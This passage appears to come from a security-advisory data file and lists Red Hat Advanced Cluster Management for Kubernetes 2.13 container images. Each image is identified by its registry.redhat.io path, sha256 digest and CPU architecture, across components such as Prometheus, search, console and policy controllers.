"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
